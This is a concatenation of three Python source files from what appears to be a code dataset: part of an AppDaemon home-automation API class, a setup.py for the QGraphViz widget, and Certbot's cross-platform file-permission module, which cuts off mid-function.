return utils.run_coroutine_threadsafe(self, self.AD.logging.add_log_callback(namespace, self.name, cb, level, **kwargs))
def cancel_listen_log(self, handle):
self.logger.debug("Canceling listen_log for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.logging.cancel_log_callback(self.name, handle))
def get_main_log(self):
return self.logger
def get_error_log(self):
return self.err
def get_user_log(self, log):
logger = None
if log in self.user_logs:
# Did we use it already?
logger = self.user_logs[log]
else:
# Build it on the fly
parent = self.AD.logging.get_user_log(self, log)
if parent is not None:
logger = parent.getChild(self.name)
self.user_logs[log] = logger
if "log_level" in self.args:
logger.setLevel(self.args["log_level"])
return logger
def set_log_level(self, level):
self.logger.setLevel(self._logging.log_levels[level])
self.err.setLevel(self._logging.log_levels[level])
for log in self.user_logs:
self.user_logs[log].setLevel(self._logging.log_levels[level])
def set_error_level(self, level):
self.err.setLevel(self._logging.log_levels[level])
#
# Threading
#
def set_app_pin(self, pin):
utils.run_coroutine_threadsafe(self, self.AD.threading.set_app_pin(self.name, pin))
def get_app_pin(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_app_pin(self.name))
def set_pin_thread(self, thread):
utils.run_coroutine_threadsafe(self, self.AD.threading.set_pin_thread(self.name, thread))
def get_pin_thread(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_pin_thread(self.name))
#
# Namespace
#
def set_namespace(self, namespace):
self._namespace = namespace
def get_namespace(self):
return self._namespace
def list_namespaces(self):
return utils.run_coroutine_threadsafe(self, self.AD.state.list_namespaces())
def save_namespace(self, namespace):
utils.run_coroutine_threadsafe(self, self.AD.state.save_namespace(namespace))
#
# Utility
#
def get_app(self, name):
return utils.run_coroutine_threadsafe(self, self.AD.app_management.get_app(name))
def _check_entity(self, namespace, entity):
if "." not in entity:
raise ValueError(
"{}: Invalid entity ID: {}".format(self.name, entity))
if not utils.run_coroutine_threadsafe(self, self.AD.state.entity_exists(namespace, entity)):
self.logger.warning("%s: Entity %s not found in namespace %s", self.name, entity, namespace)
def get_ad_version(self):
return utils.__version__
def entity_exists(self, entity_id, **kwargs):
namespace = self._get_namespace(**kwargs)
return utils.run_coroutine_threadsafe(self, self.AD.state.entity_exists(namespace, entity_id))
def split_entity(self, entity_id, **kwargs):
self._check_entity(self._get_namespace(**kwargs), entity_id)
return entity_id.split(".")
def split_device_list(self, list_):
return list_.split(",")
def get_plugin_config(self, **kwargs):
namespace = self._get_namespace(**kwargs)
return utils.run_coroutine_threadsafe(self, self.AD.plugins.get_plugin_meta(namespace))
def friendly_name(self, entity_id, **kwargs):
self._check_entity(self._get_namespace(**kwargs), entity_id)
state = self.get_state(**kwargs)
if entity_id in state:
if "friendly_name" in state[entity_id]["attributes"]:
return state[entity_id]["attributes"]["friendly_name"]
else:
return entity_id
return None
#
# Apiai
#
@staticmethod
def get_apiai_intent(data):
if "result" in data and "action" in data["result"]:
return data["result"]["action"]
else:
return None
@staticmethod
def get_apiai_slot_value(data, slot=None):
if "result" in data and \
"contexts" in data["result"]:
req = data.get('result')
contexts = req.get('contexts', [{}])
if contexts:
parameters = contexts[0].get('parameters')
else:
parameters = req.get('parameters')
if slot is None:
return parameters
else:
if slot in parameters:
return parameters[slot]
else:
return None
else:
return None
@staticmethod
def format_apiai_response(speech=None):
speech = \
{
"speech": speech,
"source": "Appdaemon",
"displayText": speech
}
return speech
#
# Alexa
#
@staticmethod
def format_alexa_response(speech=None, card=None, title=None):
response = \
{
"shouldEndSession": True
}
if speech is not None:
response["outputSpeech"] = \
{
"type": "PlainText",
"text": speech
}
if card is not None:
response["card"] = \
{
"type": "Simple",
"title": title,
"content": card
}
speech = \
{
"version": "1.0",
"response": response,
"sessionAttributes": {}
}
return speech
#
# API
#
def register_endpoint(self, cb, name=None):
if name is None:
ep = self.name
else:
ep = name
if self.AD.http is not None:
return utils.run_coroutine_threadsafe(self, self.AD.http.register_endpoint(cb, ep))
else:
self.logger.warning("register_endpoint for %s filed - HTTP component is not configured", name)
def unregister_endpoint(self, handle):
utils.run_coroutine_threadsafe(self, self.AD.http.unregister_endpoint(handle, self.name))
#
# State
#
def listen_state(self, cb, entity=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
name = self.name
if entity is not None and "." in entity:
self._check_entity(namespace, entity)
return utils.run_coroutine_threadsafe(self, self.AD.state.add_state_callback(name, namespace, entity, cb, kwargs))
def cancel_listen_state(self, handle):
self.logger.debug("Canceling listen_state for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.state.cancel_state_callback(handle, self.name))
def info_listen_state(self, handle):
self.logger.debug("Calling info_listen_state for %s",self.name)
return utils.run_coroutine_threadsafe(self, self.AD.state.info_state_callback(handle, self.name))
def get_state(self, entity_id=None, attribute=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self, self.AD.state.get_state(self.name, namespace, entity_id, attribute, **kwargs))
def set_state(self, entity_id, **kwargs):
self.logger.debug("set state: %s, %s", entity_id, kwargs)
namespace = self._get_namespace(**kwargs)
self._check_entity(namespace, entity_id)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self,
self.AD.state.set_state(self.name, namespace, entity_id, **kwargs))
#
# Service
#
@staticmethod
def _check_service(service):
if service.find("/") == -1:
raise ValueError("Invalid Service Name: {}".format(service))
def call_service(self, service, **kwargs):
self._check_service(service)
d, s = service.split("/")
self.logger.debug("call_service: %s/%s, %s", d, s, kwargs)
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
return utils.run_coroutine_threadsafe(self, self.AD.services.call_service(namespace, d, s, kwargs))
#
# Events
#
def listen_event(self, cb, event=None, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
_name = self.name
self.logger.debug("Calling listen_event for %s", self.name)
return utils.run_coroutine_threadsafe(self, self.AD.events.add_event_callback(_name, namespace, cb, event, **kwargs))
def cancel_listen_event(self, handle):
self.logger.debug("Canceling listen_event for %s", self.name)
utils.run_coroutine_threadsafe(self, self.AD.events.cancel_event_callback(self.name, handle))
def info_listen_event(self, handle):
self.logger.debug("Calling info_listen_event for %s", self.name)
return utils.run_coroutine_threadsafe(self, self.AD.events.info_event_callback(self.name, handle))
def fire_event(self, event, **kwargs):
namespace = self._get_namespace(**kwargs)
if "namespace" in kwargs:
del kwargs["namespace"]
utils.run_coroutine_threadsafe(self, self.AD.events.fire_event(namespace, event, **kwargs))
#
# Time
#
def parse_utc_string(self, s):
return datetime.datetime(*map(
int, re.split('[^\d]', s)[:-1]
)).timestamp() + self.get_tz_offset() * 60
@staticmethod
def get_tz_offset():
utc_offset_min = int(round(
(datetime.datetime.now()
- datetime.datetime.utcnow()).total_seconds())
) / 60 # round for taking time twice
utc_offset_h = utc_offset_min / 60
# we do not handle 1/2 h timezone offsets
assert utc_offset_min == utc_offset_h * 60
return utc_offset_min
@staticmethod
def convert_utc(utc):
return iso8601.parse_date(utc)
def sun_up(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sun_up())
def sun_down(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sun_down())
def parse_time(self, time_str, name=None, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.parse_time(time_str, name, aware))
def parse_datetime(self, time_str, name=None, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.parse_datetime(time_str, name, aware))
def get_now(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now())
def get_now_ts(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now_ts())
def now_is_between(self, start_time_str, end_time_str, name=None):
return utils.run_coroutine_threadsafe(self, self.AD.sched.now_is_between(start_time_str, end_time_str, name))
def sunrise(self, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sunrise(aware))
def sunset(self, aware=False):
return utils.run_coroutine_threadsafe(self, self.AD.sched.sunset(aware))
def time(self):
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz).time())
def datetime(self, aware=False):
if aware is True:
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz))
else:
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_now_naive())
def date(self):
return (utils.run_coroutine_threadsafe(self, self.AD.sched.get_now()).astimezone(self.AD.tz).date())
def get_timezone(self):
return self.AD.time_zone
#
# Scheduler
#
def cancel_timer(self, handle):
name = self.name
utils.run_coroutine_threadsafe(self, self.AD.sched.cancel_timer(name, handle))
def info_timer(self, handle):
return utils.run_coroutine_threadsafe(self, self.AD.sched.info_timer(handle, self.name))
def run_in(self, callback, seconds, **kwargs):
name = self.name
self.logger.debug("Registering run_in in %s seconds for %s", seconds, name)
# convert seconds to an int if possible since a common pattern is to
# pass this through from the config file which is a string
exec_time = self.get_now() + timedelta(seconds=int(seconds))
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, exec_time, callback, False, None, **kwargs
))
return handle
def run_once(self, callback, start, **kwargs):
if type(start) == datetime.time:
when = start
elif type(start) == str:
when = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name, True))["datetime"].time()
else:
raise ValueError("Invalid type for start")
name = self.name
now = self.get_now()
today = now.date()
event = datetime.datetime.combine(today, when)
if event < now:
one_day = datetime.timedelta(days=1)
event = event + one_day
exec_time = event.timestamp()
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, exec_time, callback, False, None, **kwargs
))
return handle
def run_at(self, callback, start, **kwargs):
if type(start) == datetime.datetime:
when = start
elif type(start) == str:
when = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name))["datetime"]
else:
raise ValueError("Invalid type for start")
aware_when = self.AD.sched.convert_naive(when)
name = self.name
now = self.get_now()
if aware_when < now:
raise ValueError(
"{}: run_at() Start time must be "
"in the future".format(self.name)
)
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, aware_when, callback, False, None, **kwargs
))
return handle
def run_daily(self, callback, start, **kwargs):
info = None
when = None
if type(start) == datetime.time:
when = start
elif type(start) == str:
info = utils.run_coroutine_threadsafe(self, self.AD.sched._parse_time(start, self.name))
else:
raise ValueError("Invalid type for start")
if info is None or info["sun"] is None:
if when is None:
when = info["datetime"].time()
aware_now = self.get_now()
now = self.AD.sched.make_naive(aware_now)
today = now.date()
event = datetime.datetime.combine(today, when)
if event < now:
event = event + datetime.timedelta(days=1)
handle = self.run_every(callback, event, 24 * 60 * 60, **kwargs)
elif info["sun"] == "sunrise":
kwargs["offset"] = info["offset"]
handle = self.run_at_sunrise(callback, **kwargs)
else:
kwargs["offset"] = info["offset"]
handle = self.run_at_sunset(callback, **kwargs)
return handle
def run_hourly(self, callback, start, **kwargs):
now = self.get_now()
if start is None:
event = now + datetime.timedelta(hours=1)
else:
event = now
event = event.replace(minute=start.minute, second=start.second)
if event < now:
event = event + datetime.timedelta(hours=1)
handle = self.run_every(callback, event, 60 * 60, **kwargs)
return handle
def run_minutely(self, callback, start, **kwargs):
now = self.get_now()
if start is None:
event = now + datetime.timedelta(minutes=1)
else:
event = now
event = event.replace(second=start.second)
if event < now:
event = event + datetime.timedelta(minutes=1)
handle = self.run_every(callback, event, 60, **kwargs)
return handle
def run_every(self, callback, start, interval, **kwargs):
name = self.name
now = self.get_now()
aware_start = self.AD.sched.convert_naive(start)
if aware_start < now:
raise ValueError("start cannot be in the past")
self.logger.debug("Registering run_every starting %s in %ss intervals for %s", aware_start, interval, name)
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(name, aware_start, callback, True, None,
interval=interval, **kwargs))
return handle
def _schedule_sun(self, name, type_, callback, **kwargs):
if type_ == "next_rising":
event = self.AD.sched.next_sunrise()
else:
event = self.AD.sched.next_sunset()
handle = utils.run_coroutine_threadsafe(self, self.AD.sched.insert_schedule(
name, event, callback, True, type_, **kwargs
))
return handle
def run_at_sunset(self, callback, **kwargs):
name = self.name
self.logger.debug("Registering run_at_sunset with kwargs = %s for %s", kwargs, name)
handle = self._schedule_sun(name, "next_setting", callback, **kwargs)
return handle
def run_at_sunrise(self, callback, **kwargs):
name = self.name
self.logger.debug("Registering run_at_sunrise with kwargs = %s for %s", kwargs, name)
handle = self._schedule_sun(name, "next_rising", callback, **kwargs)
return handle
#
# Dashboard
#
def dash_navigate(self, target, timeout=-1, ret=None, sticky=0):
kwargs = {"command": "navigate", "target": target, "sticky": sticky}
if timeout != -1:
kwargs["timeout"] = timeout
if ret is not None:
kwargs["return"] = ret
self.fire_event("__HADASHBOARD_EVENT", **kwargs)
#
# Other
#
def run_in_thread(self, callback, thread):
self.run_in(callback, 0, pin=False, pin_thread=thread)
def get_thread_info(self):
return utils.run_coroutine_threadsafe(self, self.AD.threading.get_thread_info())
def get_scheduler_entries(self):
return utils.run_coroutine_threadsafe(self, self.AD.sched.get_scheduler_entries())
def get_callback_entries(self):
return utils.run_coroutine_threadsafe(self, self.AD.callbacks.get_callback_entries())
@staticmethod
def get_alexa_slot_value(data, slot=None):
if "request" in data and \
"intent" in data["request"] and \
"slots" in data["request"]["intent"]:
if slot is None:
return data["request"]["intent"]["slots"]
else:
if slot in data["request"]["intent"]["slots"] and \
"value" in data["request"]["intent"]["slots"][slot]:
return data["request"]["intent"]["slots"][slot]["value"]
else:
return None
else:
return None
@staticmethod
def get_alexa_error(data):
if "request" in data and "err" in data["request"] and "message" in data["request"]["err"]:
return data["request"]["err"]["message"]
else:
return None
@staticmethod
def get_alexa_intent(data):
if "request" in data and "intent" in data["request"] and "name" in data["request"]["intent"]:
return data["request"]["intent"]["name"]
else:
return None
|
py | 7df7dfe14ba4c81038e3d28e6750bd8c99a54f43 | import setuptools
#with open("README.md", "r") as fh:
# long_description = fh.read()
long_description="""
Project information here https://github.com/ParisNeo/QGraphViz
"""
setuptools.setup(
name='QGraphViz',
version='0.0.55',
author="Saifeddine ALOUI",
author_email="[email protected]",
description="A PyQt5 widget to manipulate (build, render, interact, load and save) Graphviz graphs",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ParisNeo/QGraphViz",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) |
py | 7df7dff11d5764356f2efad4ea1546fd5713b14c | """Compat module to handle files security on Windows and Linux"""
from __future__ import absolute_import
import errno
import os # pylint: disable=os-module-forbidden
import stat
import sys
from acme.magic_typing import List
try:
import ntsecuritycon
import win32security
import win32con
import win32api
import win32file
import pywintypes
import winerror
except ImportError:
POSIX_MODE = True
else:
POSIX_MODE = False
# Windows umask implementation, since Windows does not have a concept of umask by default.
# We choose 022 as initial value since it is the default one on most Linux distributions, and
# it is a decent choice to not have write permissions for group owner and everybody by default.
# We use a class here to avoid needing to define a global variable, and the potential mistakes
# that could happen with this kind of pattern.
class _WindowsUmask:
"""Store the current umask to apply on Windows"""
def __init__(self):
self.mask = 0o022
_WINDOWS_UMASK = _WindowsUmask()
def chmod(file_path, mode):
# type: (str, int) -> None
"""
Apply a POSIX mode on given file_path:
- for Linux, the POSIX mode will be directly applied using chmod,
- for Windows, the POSIX mode will be translated into a Windows DACL that make sense for
Certbot context, and applied to the file using kernel calls.
The definition of the Windows DACL that correspond to a POSIX mode, in the context of Certbot,
is explained at https://github.com/certbot/certbot/issues/6356 and is implemented by the
method `_generate_windows_flags()`.
:param str file_path: Path of the file
:param int mode: POSIX mode to apply
"""
if POSIX_MODE:
os.chmod(file_path, mode)
else:
_apply_win_mode(file_path, mode)
def umask(mask):
# type: (int) -> int
"""
Set the current numeric umask and return the previous umask. On Linux, the built-in umask
method is used. On Windows, our Certbot-side implementation is used.
:param int mask: The user file-creation mode mask to apply.
:rtype: int
:return: The previous umask value.
"""
if POSIX_MODE:
return os.umask(mask)
previous_umask = _WINDOWS_UMASK.mask
_WINDOWS_UMASK.mask = mask
return previous_umask
# One could ask why there is no copy_ownership() function, or even a reimplementation
# of os.chown() that would modify the ownership of file without touching the mode itself.
# This is because on Windows, it would require recalculating the existing DACL against
# the new owner, since the DACL is composed of ACEs that targets a specific user, not dynamically
# the current owner of a file. This action would be necessary to keep consistency between
# the POSIX mode applied to the file and the current owner of this file.
# Since copying and editing arbitrary DACL is very difficult, and since we actually know
# the mode to apply at the time the owner of a file should change, it is easier to just
# change the owner, then reapply the known mode, as copy_ownership_and_apply_mode() does.
def copy_ownership_and_apply_mode(src, dst, mode, copy_user, copy_group):
# type: (str, str, int, bool, bool) -> None
"""
Copy ownership (user and optionally group on Linux) from the source to the
destination, then apply given mode in compatible way for Linux and Windows.
This replaces the os.chown command.
:param str src: Path of the source file
:param str dst: Path of the destination file
:param int mode: Permission mode to apply on the destination file
:param bool copy_user: Copy user if `True`
:param bool copy_group: Copy group if `True` on Linux (has no effect on Windows)
"""
if POSIX_MODE:
stats = os.stat(src)
user_id = stats.st_uid if copy_user else -1
group_id = stats.st_gid if copy_group else -1
# On Windows, os.chown does not exist. This is checked through POSIX_MODE value,
# but MyPy/PyLint does not know it and raises an error here on Windows.
# We disable specifically the check to fix the issue.
os.chown(dst, user_id, group_id)
elif copy_user:
# There is no group handling in Windows
_copy_win_ownership(src, dst)
chmod(dst, mode)
# Quite similar to copy_ownership_and_apply_mode, but this time the DACL is copied from
# the source file on Windows. The DACL stays consistent with the dynamic rights of the
# equivalent POSIX mode, because ownership and mode are copied altogether on the destination
# file, so no recomputing of the DACL against the new owner is needed, as it would be
# for a copy_ownership alone method.
def copy_ownership_and_mode(src, dst, copy_user=True, copy_group=True):
# type: (str, str, bool, bool) -> None
"""
Copy ownership (user and optionally group on Linux) and mode/DACL
from the source to the destination.
:param str src: Path of the source file
:param str dst: Path of the destination file
:param bool copy_user: Copy user if `True`
:param bool copy_group: Copy group if `True` on Linux (has no effect on Windows)
"""
if POSIX_MODE:
# On Linux, we just delegate to chown and chmod.
stats = os.stat(src)
user_id = stats.st_uid if copy_user else -1
group_id = stats.st_gid if copy_group else -1
os.chown(dst, user_id, group_id)
chmod(dst, stats.st_mode)
else:
if copy_user:
# There is no group handling in Windows
_copy_win_ownership(src, dst)
_copy_win_mode(src, dst)
def check_mode(file_path, mode):
# type: (str, int) -> bool
"""
Check if the given mode matches the permissions of the given file.
On Linux, will make a direct comparison, on Windows, mode will be compared against
the security model.
:param str file_path: Path of the file
:param int mode: POSIX mode to test
:rtype: bool
:return: True if the POSIX mode matches the file permissions
"""
if POSIX_MODE:
return stat.S_IMODE(os.stat(file_path).st_mode) == mode
return _check_win_mode(file_path, mode)
def check_owner(file_path):
# type: (str) -> bool
"""
Check if given file is owned by current user.
:param str file_path: File path to check
:rtype: bool
:return: True if given file is owned by current user, False otherwise.
"""
if POSIX_MODE:
# On Windows, os.getuid does not exist. This is checked through POSIX_MODE value,
# but MyPy/PyLint does not know it and raises an error here on Windows.
# We disable specifically the check to fix the issue.
return os.stat(file_path).st_uid == os.getuid() # type: ignore
# Get owner sid of the file
security = win32security.GetFileSecurity(file_path, win32security.OWNER_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
# Compare sids
return _get_current_user() == user
def check_permissions(file_path, mode):
# type: (str, int) -> bool
"""
Check if given file has the given mode and is owned by current user.
:param str file_path: File path to check
:param int mode: POSIX mode to check
:rtype: bool
:return: True if file has correct mode and owner, False otherwise.
"""
return check_owner(file_path) and check_mode(file_path, mode)
def open(file_path, flags, mode=0o777): # pylint: disable=redefined-builtin
# type: (str, int, int) -> int
"""
Wrapper of original os.open function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int flags: Flags to apply on file while opened
:param int mode: POSIX mode to apply on file when opened,
Python defaults will be applied if ``None``
:returns: the file descriptor to the opened file
:rtype: int
:raise: OSError(errno.EEXIST) if the file already exists and os.O_CREAT & os.O_EXCL are set,
OSError(errno.EACCES) on Windows if the file already exists and is a directory, and
os.O_CREAT is set.
"""
if POSIX_MODE:
# On Linux, invoke os.open directly.
return os.open(file_path, flags, mode)
# Windows: handle creation of the file atomically with proper permissions.
if flags & os.O_CREAT:
# If os.O_EXCL is set, we will use the "CREATE_NEW", that will raise an exception if
# file exists, matching the API contract of this bit flag. Otherwise, we use
# "CREATE_ALWAYS" that will always create the file whether it exists or not.
disposition = win32con.CREATE_NEW if flags & os.O_EXCL else win32con.CREATE_ALWAYS
attributes = win32security.SECURITY_ATTRIBUTES()
security = attributes.SECURITY_DESCRIPTOR
user = _get_current_user()
dacl = _generate_dacl(user, mode, _WINDOWS_UMASK.mask)
# We set second parameter to 0 (`False`) to say that this security descriptor is
# NOT constructed from a default mechanism, but is explicitly set by the user.
# See https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-setsecuritydescriptorowner # pylint: disable=line-too-long
security.SetSecurityDescriptorOwner(user, 0)
# We set first parameter to 1 (`True`) to say that this security descriptor contains
# a DACL. Otherwise second and third parameters are ignored.
# We set third parameter to 0 (`False`) to say that this security descriptor is
# NOT constructed from a default mechanism, but is explicitly set by the user.
# See https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-setsecuritydescriptordacl # pylint: disable=line-too-long
security.SetSecurityDescriptorDacl(1, dacl, 0)
handle = None
try:
handle = win32file.CreateFile(file_path, win32file.GENERIC_READ,
win32file.FILE_SHARE_READ & win32file.FILE_SHARE_WRITE,
attributes, disposition, 0, None)
except pywintypes.error as err:
# Handle native windows errors into python errors to be consistent with the API
# of os.open in the situation of a file already existing or locked.
if err.winerror == winerror.ERROR_FILE_EXISTS:
raise OSError(errno.EEXIST, err.strerror)
if err.winerror == winerror.ERROR_SHARING_VIOLATION:
raise OSError(errno.EACCES, err.strerror)
raise err
finally:
if handle:
handle.Close()
# At this point, the file that did not exist has been created with proper permissions,
# so os.O_CREAT and os.O_EXCL are not needed anymore. We remove them from the flags to
# avoid a FileExists exception before calling os.open.
return os.open(file_path, flags ^ os.O_CREAT ^ os.O_EXCL)
# Windows: general case, we call os.open, let exceptions be thrown, then chmod if all is fine.
handle = os.open(file_path, flags)
chmod(file_path, mode)
return handle
def makedirs(file_path, mode=0o777):
# type: (str, int) -> None
"""
Rewrite of original os.makedirs function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int mode: POSIX mode to apply on leaf directory when created, Python defaults
will be applied if ``None``
"""
current_umask = umask(0)
try:
# Since Python 3.7, os.makedirs does not set the given mode to the intermediate
# directories that could be created in the process. To keep things safe and consistent
# on all Python versions, we set the umask accordingly to have all directories
# (intermediate and leaf) created with the given mode.
umask(current_umask | 0o777 ^ mode)
if POSIX_MODE:
return os.makedirs(file_path, mode)
orig_mkdir_fn = os.mkdir
try:
# As we know that os.mkdir is called internally by os.makedirs, we will swap the
# function in os module for the time of makedirs execution on Windows.
os.mkdir = mkdir # type: ignore
return os.makedirs(file_path, mode)
finally:
os.mkdir = orig_mkdir_fn
finally:
umask(current_umask)
def mkdir(file_path, mode=0o777):
# type: (str, int) -> None
"""
Rewrite of original os.mkdir function, that will ensure on Windows that given mode
is correctly applied.
:param str file_path: The file path to open
:param int mode: POSIX mode to apply on directory when created, Python defaults
will be applied if ``None``
"""
if POSIX_MODE:
return os.mkdir(file_path, mode)
attributes = win32security.SECURITY_ATTRIBUTES()
security = attributes.SECURITY_DESCRIPTOR
user = _get_current_user()
dacl = _generate_dacl(user, mode, _WINDOWS_UMASK.mask)
security.SetSecurityDescriptorOwner(user, False)
security.SetSecurityDescriptorDacl(1, dacl, 0)
try:
win32file.CreateDirectory(file_path, attributes)
except pywintypes.error as err:
# Handle native windows error into python error to be consistent with the API
# of os.mkdir in the situation of a directory already existing.
if err.winerror == winerror.ERROR_ALREADY_EXISTS:
raise OSError(errno.EEXIST, err.strerror, file_path, err.winerror)
raise err
return None
def replace(src, dst):
# type: (str, str) -> None
"""
Rename a file to a destination path and handles situations where the destination exists.
:param str src: The current file path.
:param str dst: The new file path.
"""
if hasattr(os, 'replace'):
# Use replace if possible. Since we don't support Python 2 on Windows
# and os.replace() was added in Python 3.3, we can assume that
# os.replace() is always available on Windows.
getattr(os, 'replace')(src, dst)
else:
# Otherwise, use os.rename() that behaves like os.replace() on Linux.
os.rename(src, dst)
def realpath(file_path):
# type: (str) -> str
"""
Find the real path for the given path. This method resolves symlinks, including
recursive symlinks, and is protected against symlinks that creates an infinite loop.
:param str file_path: The path to resolve
:returns: The real path for the given path
:rtype: str
"""
original_path = file_path
# Since Python 3.8, os.path.realpath also resolves symlinks on Windows.
if POSIX_MODE or sys.version_info >= (3, 8):
path = os.path.realpath(file_path)
if os.path.islink(path):
# If path returned by realpath is still a link, it means that it failed to
# resolve the symlink because of a loop.
# See realpath code: https://github.com/python/cpython/blob/master/Lib/posixpath.py
raise RuntimeError('Error, link {0} is a loop!'.format(original_path))
return path
inspected_paths = [] # type: List[str]
while os.path.islink(file_path):
link_path = file_path
file_path = os.readlink(file_path)
if not os.path.isabs(file_path):
file_path = os.path.join(os.path.dirname(link_path), file_path)
if file_path in inspected_paths:
raise RuntimeError('Error, link {0} is a loop!'.format(original_path))
inspected_paths.append(file_path)
return os.path.abspath(file_path)
def readlink(link_path):
# type: (str) -> str
"""
Return a string representing the path to which the symbolic link points.
:param str link_path: The symlink path to resolve
:return: The path the symlink points to
:returns: str
:raise: ValueError if a long path (260> characters) is encountered on Windows
"""
path = os.readlink(link_path)
if POSIX_MODE or not path.startswith('\\\\?\\'):
return path
# At that point, we are on Windows and the path returned uses the long form (Python 3.8+).
# Max length of a normal path is 260 characters on Windows, including the non printable
# termination character "<NUL>". The termination character is not included in Python
# strings, giving a max length of 259 characters, + 4 characters for the extended form
# prefix, to an effective max length 263 characters on a string representing a normal path.
if len(path) < 264:
return path[4:]
raise ValueError("Long paths are not supported by Certbot on Windows.")
# On Windows is_executable run from an unprivileged shell may claim that a path is
# executable when it is executable only if run from a privileged shell. This result
# is due to the fact that GetEffectiveRightsFromAcl calculate effective rights
# without taking into consideration if the target user has currently required the
# elevated privileges or not. However this is not a problem since certbot always
# requires to be run under a privileged shell, so the user will always benefit
# from the highest (privileged one) set of permissions on a given file.
def is_executable(path):
# type: (str) -> bool
"""
Is path an executable file?
:param str path: path to test
:return: True if path is an executable file
:rtype: bool
"""
if POSIX_MODE:
return os.path.isfile(path) and os.access(path, os.X_OK)
return _win_is_executable(path)
def has_world_permissions(path):
# type: (str) -> bool
"""
Check if everybody/world has any right (read/write/execute) on a file given its path.
:param str path: path to test
:return: True if everybody/world has any right to the file
:rtype: bool
"""
if POSIX_MODE:
return bool(stat.S_IMODE(os.stat(path).st_mode) & stat.S_IRWXO)
security = win32security.GetFileSecurity(path, win32security.DACL_SECURITY_INFORMATION)
dacl = security.GetSecurityDescriptorDacl()
return bool(dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': win32security.ConvertStringSidToSid('S-1-1-0'),
}))
def compute_private_key_mode(old_key, base_mode):
# type: (str, int) -> int
"""
Calculate the POSIX mode to apply to a private key given the previous private key.
:param str old_key: path to the previous private key
:param int base_mode: the minimum modes to apply to a private key
:return: the POSIX mode to apply
:rtype: int
"""
if POSIX_MODE:
# On Linux, we keep read/write/execute permissions
# for group and read permissions for everybody.
old_mode = (stat.S_IMODE(os.stat(old_key).st_mode) &
(stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH))
return base_mode | old_mode
# On Windows, the mode returned by os.stat is not reliable,
# so we do not keep any permission from the previous private key.
return base_mode
def has_same_ownership(path1, path2):
# type: (str, str) -> bool
"""
Return True if the ownership of two files given their respective path is the same.
On Windows, ownership is checked against owner only, since files do not have a group owner.
:param str path1: path to the first file
:param str path2: path to the second file
:return: True if both files have the same ownership, False otherwise
:rtype: bool
"""
if POSIX_MODE:
stats1 = os.stat(path1)
stats2 = os.stat(path2)
return (stats1.st_uid, stats1.st_gid) == (stats2.st_uid, stats2.st_gid)
security1 = win32security.GetFileSecurity(path1, win32security.OWNER_SECURITY_INFORMATION)
user1 = security1.GetSecurityDescriptorOwner()
security2 = win32security.GetFileSecurity(path2, win32security.OWNER_SECURITY_INFORMATION)
user2 = security2.GetSecurityDescriptorOwner()
return user1 == user2
def has_min_permissions(path, min_mode):
# type: (str, int) -> bool
"""
Check if a file given its path has at least the permissions defined by the given minimal mode.
On Windows, group permissions are ignored since files do not have a group owner.
:param str path: path to the file to check
:param int min_mode: the minimal permissions expected
:return: True if the file matches the minimal permissions expectations, False otherwise
:rtype: bool
"""
if POSIX_MODE:
st_mode = os.stat(path).st_mode
return st_mode == st_mode | min_mode
# Resolve symlinks, to get a consistent result with os.stat on Linux,
# that follows symlinks by default.
path = realpath(path)
# Get owner sid of the file
security = win32security.GetFileSecurity(
path, win32security.OWNER_SECURITY_INFORMATION | win32security.DACL_SECURITY_INFORMATION)
user = security.GetSecurityDescriptorOwner()
dacl = security.GetSecurityDescriptorDacl()
min_dacl = _generate_dacl(user, min_mode)
for index in range(min_dacl.GetAceCount()):
min_ace = min_dacl.GetAce(index)
# On a given ACE, index 0 is the ACE type, 1 is the permission mask, and 2 is the SID.
# See: http://timgolden.me.uk/pywin32-docs/PyACL__GetAce_meth.html
mask = min_ace[1]
user = min_ace[2]
effective_mask = dacl.GetEffectiveRightsFromAcl({
'TrusteeForm': win32security.TRUSTEE_IS_SID,
'TrusteeType': win32security.TRUSTEE_IS_USER,
'Identifier': user,
})
if effective_mask != effective_mask | mask:
return False
return True
def _win_is_executable(path):
if not os.path.isfile(path):
return False
